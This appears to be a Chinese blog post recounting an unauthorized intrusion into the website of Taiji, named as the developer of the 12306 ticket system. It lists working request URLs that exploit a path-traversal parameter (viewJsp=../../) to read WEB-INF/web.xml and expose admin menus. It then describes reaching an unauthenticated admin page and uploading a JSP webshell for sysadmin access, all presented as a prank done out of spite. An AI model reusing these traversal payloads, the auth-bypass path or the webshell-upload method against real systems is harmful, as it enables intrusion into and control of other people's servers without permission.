国庆就要来了，返乡出行的高峰期来了，最近无论是身边还是网络上的都怨声载道啊，原因就是火车票，网上订票系统12306真是没话说了，大家都懂的！

于是最近大家都把气撒在了收1.99亿开发出这么个破网站的公司：“太极”身上，主页http://www.taiji.com.cn/

下面我就把过程写出来和大家分享。

打开主页的网址默认跳到了这个链接

http://www.taiji.com.cn/coboportal/portal/compayindex.ptview

鼠标随便停在新闻链接上状态栏显示如下，

http://www.taiji.com.cn/coboportal/portal/itservice.ptview?funcid=showGSWZInfoLink&infoSortId=52802&infoLinkId=13962&viewJsp=gswz/newsevents/newsshowcontent.jsp

试了试infoSortId=52802这里是木有注入的哦，不过看着viewjsp这个参数有点特别哦，后面直接接上相对路径真是jsp文件地址了，于是我们来试试包含漏洞或者任意文件下载漏洞~

构造如下地址：

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=index.jsp

打开发现404如图：

继续构造，把viewJsp=index.jsp改为viewJsp=../index.jsp：

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=../index.jsp

依然是404

继续~

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=../../index.jsp

出来了个这个网页，这好像是个灰常低调的菜单导航，上面有后台的地址链接，还有清空系统缓存等功能

随便点点后台如图

又是404

http://www.taiji.com.cn/coboportal/portal/wafplatform/portletmanage.do?funcid=flushSessinoOsCache

去掉了/portal/wafplatform这两个目录也是打不开的，于是试到这的时候也是上面那个菜单导航

http://www.taiji.com.cn/coboportal/

这下可以直接点了到后台了

也可以清空缓存：

注意到地址如下

http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushAllOsCache

http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushSessinoOsCache

http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=reloadCache

http://www.taiji.com.cn/coboportal/wafplatform/portalpagemanage.do?funcid=reloadCache

到这里我直接去试着弱口令登录后台了，不行！注入、万能密码什么的也过滤了的~

看来思路到这里就死了，

又随便试了下包含漏洞读取java 网站的配置文件web.xml看能不能读取出点什么

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869 &viewJsp=../../WEB-INF/web.xml

除了个内网IP敏感点其他没什么鸟信息可以利用``肿么办呢，于是先放一放 休息会咯

又翻啊翻，看网页源文件的时候找到个链接~

www.taiji.com.cn/coboportal/portal/portlet/gswz/iframediv.html

是敏感点 依然没什么用！

晚上的时候群里的兄弟们也讨论起这个站，这个好，终于找到基友了，但是根据截图来看他们已经进了后台了，我还在后台门口傻望着呢，肿么办呢，就去请教了下大牛，经过我的软磨硬泡嘘寒问暖关怀备至一番，原来大牛们在清空缓存那儿的链接直接就可以进去的！

怎么进呢，清空缓存的链接是http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushAllOsCache

去掉？后面的参数http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do打开了直接就是后台，没有验证的，惭愧啊，我都不好意思直视大牛的双眼！

真是坑爹啊，难怪做出来的12306.cn风格都是一个样，就是坑爹！

进了后台随便找个添加新闻的上传个jsp，没过滤滴！这样就拿到大马了，sysadmin权限~

接下来的提权内网渗透就不玩了，小小滴娱乐一下就算了，剩下的还是留给大牛们玩去··